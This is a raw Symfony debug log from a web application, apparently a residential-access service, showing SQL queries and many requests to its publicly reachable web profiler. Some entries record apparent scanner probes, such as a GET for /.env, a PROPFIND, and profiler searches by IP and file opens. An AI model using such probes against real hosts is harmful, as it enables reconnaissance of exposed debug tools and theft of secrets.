[2025-12-20 01:14:40] doctrine.DEBUG: SELECT t0.status AS status_1, t0.date_created AS date_created_2, t0.date_modified AS date_modified_3, t0.user_id AS user_id_4, t0.address_id AS address_id_5, t0.parent_id AS parent_id_6, t0.permission AS permission_7, t0.color AS color_8, t0.rent AS rent_9 FROM user_has_address t0 WHERE t0.user_id = ? AND t0.address_id = ? AND t0.status = ? [398,274,1] []
[2025-12-20 01:14:40] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
[2025-12-20 01:14:40] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? LIMIT 1 [15] []
[2025-12-20 01:14:40] doctrine.DEBUG: SELECT i0_.id AS id_0, i0_.uuid AS uuid_1, i0_.status AS status_2, i0_.date_created AS date_created_3, i0_.date_modified AS date_modified_4, i0_.name AS name_5, i0_.last_name AS last_name_6, i0_.code AS code_7, i0_.image_code_path AS image_code_path_8, i0_.type AS type_9, i0_.subtype AS subtype_10, i0_.date_invitation AS date_invitation_11, i0_.date_start AS date_start_12, i0_.date_end AS date_end_13, i0_.event_id AS event_id_14, i0_.address_id AS address_id_15, i0_.user_id AS user_id_16 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) ORDER BY i0_.date_invitation DESC LIMIT 20 OFFSET 0 [274,1] []
[2025-12-20 01:14:40] doctrine.DEBUG: SELECT count(i0_.id) AS sclr_0 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) [274,1] []
[2025-12-20 01:14:40] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-20 01:14:40] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
[2025-12-20 01:15:39] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"565723","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/565723?panel=events","method":"GET"} []
[2025-12-20 01:15:39] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=events","method":"GET"} []
[2025-12-20 01:18:06] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"689482","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/689482?panel=time","method":"GET"} []
[2025-12-20 01:18:06] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-20 01:18:18] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"79f5c0","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/79f5c0?panel=form","method":"GET"} []
[2025-12-20 01:18:18] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=form","method":"GET"} []
[2025-12-20 01:26:07] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"924f94","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/924f94?panel=swiftmailer","method":"GET"} []
[2025-12-20 01:26:07] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=swiftmailer","method":"GET"} []
[2025-12-20 01:27:06] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"5f0320","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/5f0320?panel=dump","method":"GET"} []
[2025-12-20 01:27:06] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=dump","method":"GET"} []
[2025-12-20 01:31:02] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 01:37:07] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7e4910","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/7e4910?panel=cache","method":"GET"} []
[2025-12-20 01:37:07] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-20 01:37:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 01:41:55] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e41a6f","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/e41a6f?panel=dump","method":"GET"} []
[2025-12-20 01:41:55] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=dump","method":"GET"} []
[2025-12-20 01:49:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 01:57:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\AccessDeniedHttpException: "" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/FragmentListener.php line 90 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\AccessDeniedHttpException(code: 0): at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/FragmentListener.php:90)"} []
[2025-12-20 01:58:28] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 01:59:21] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"bbdda8","_route":"_profiler_search_results"},"request_uri":"https://web.unda.co/_profiler/bbdda8/search/results?limit=10&method=GET","method":"GET"} []
[2025-12-20 01:59:21] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?limit=10&method=GET","method":"GET"} []
[2025-12-20 02:02:43] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b6fb1d","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/b6fb1d","method":"GET"} []
[2025-12-20 02:02:43] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-20 02:03:25] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 02:03:41] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=212.47.64.207&limit=10","method":"GET"} []
[2025-12-20 02:03:41] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=212.47.64.207&limit=10","method":"GET"} []
[2025-12-20 02:05:08] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"081dae","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/081dae","method":"GET"} []
[2025-12-20 02:05:08] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-20 02:07:20] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b03665","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/b03665?panel=exception","method":"GET"} []
[2025-12-20 02:07:20] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=exception","method":"GET"} []
[2025-12-20 02:11:40] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"acf638","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/acf638?panel=time","method":"GET"} []
[2025-12-20 02:11:40] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-20 02:12:30] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-20 02:12:41] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0f40a7","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0f40a7?panel=config","method":"GET"} []
[2025-12-20 02:12:41] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-20 02:20:42] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
[2025-12-20 02:27:05] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-20 02:29:00] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"GET"} []
[2025-12-20 02:29:00] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
[2025-12-20 02:29:00] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-20 02:29:00] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-20 02:29:00] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-20 02:29:00] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-20 02:29:00] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-20 02:29:00] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F","method":"GET"} []
[2025-12-20 02:30:12] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 02:30:13] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"POST"} []
[2025-12-20 02:30:52] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"bb3b91","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/bb3b91?panel=db","method":"GET"} []
[2025-12-20 02:30:52] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
[2025-12-20 02:31:08] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"afab25","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/afab25?panel=twig","method":"GET"} []
[2025-12-20 02:31:08] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-20 02:31:53] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/latest?ip=78.153.140.188&limit=10&method=GET","method":"GET"} []
[2025-12-20 02:31:53] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?ip=78.153.140.188&limit=10&method=GET","method":"GET"} []
[2025-12-20 02:32:47] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"2d0f32","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/2d0f32","method":"GET"} []
[2025-12-20 02:32:47] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-20 02:35:51] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-20 02:35:56] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 02:41:07] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"f6e8b1","_route":"_profiler_search_results"},"request_uri":"https://web.unda.co/_profiler/f6e8b1/search/results?ip=207.180.196.165&limit=10&method=POST&url=https%3A%2F%2Fwww.unda.co%2F","method":"GET"} []
[2025-12-20 02:41:07] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?ip=207.180.196.165&limit=10&method=POST&url=https%3A%2F%2Fwww.unda.co%2F","method":"GET"} []
[2025-12-20 02:42:25] request.INFO: Matched route "_profiler_open_file". {"route":"_profiler_open_file","route_parameters":{"_controller":"web_profiler.controller.profiler:openAction","_route":"_profiler_open_file"},"request_uri":"https://www.unda.co/_profiler/open?file=src%2FHona%2FApiBundle%2FController%2FResidentialController.php&line=30","method":"GET"} []
[2025-12-20 02:42:37] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"8f04fd","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/8f04fd?panel=time","method":"GET"} []
[2025-12-20 02:42:37] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-20 02:52:27] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=162.243.172.59&limit=10","method":"GET"} []
[2025-12-20 02:52:27] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=162.243.172.59&limit=10","method":"GET"} []
[2025-12-20 02:53:35] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"5f0320","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/5f0320?panel=form","method":"GET"} []
[2025-12-20 02:53:35] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=form","method":"GET"} []
[2025-12-20 02:53:54] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 02:56:15] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-20 02:57:05] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-20 02:57:14] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"PROPFIND"} []
[2025-12-20 03:01:15] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"5f0320","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/5f0320?panel=security","method":"GET"} []
[2025-12-20 03:01:15] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=security","method":"GET"} []
[2025-12-20 03:04:48] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"1f2b28","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/1f2b28?panel=time","method":"GET"} []
[2025-12-20 03:04:48] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-20 03:06:52] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"631d61","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/631d61?panel=twig","method":"GET"} []
[2025-12-20 03:06:52] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-20 03:19:07] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"ec0d0f","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/ec0d0f?panel=time","method":"GET"} []
[2025-12-20 03:19:07] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-20 03:19:08] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/latest?panel=validator","method":"GET"} []
[2025-12-20 03:19:08] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=validator","method":"GET"} []
[2025-12-20 03:20:36] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=82.180.146.199&limit=10","method":"GET"} []
[2025-12-20 03:20:36] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=82.180.146.199&limit=10","method":"GET"} []
[2025-12-20 03:20:42] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"2263c2","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/2263c2?panel=router","method":"GET"} []
[2025-12-20 03:20:42] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=router","method":"GET"} []
[2025-12-20 03:31:25] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"3d2531","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/3d2531","method":"GET"} []
[2025-12-20 03:31:25] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-20 03:37:39] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"5f0320","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/5f0320?panel=request","method":"GET"} []
[2025-12-20 03:37:39] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=request","method":"GET"} []
[2025-12-20 03:38:50] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a0b323","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/a0b323","method":"GET"} []
[2025-12-20 03:38:50] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-20 03:39:59] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b8d5e3","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/b8d5e3","method":"GET"} []
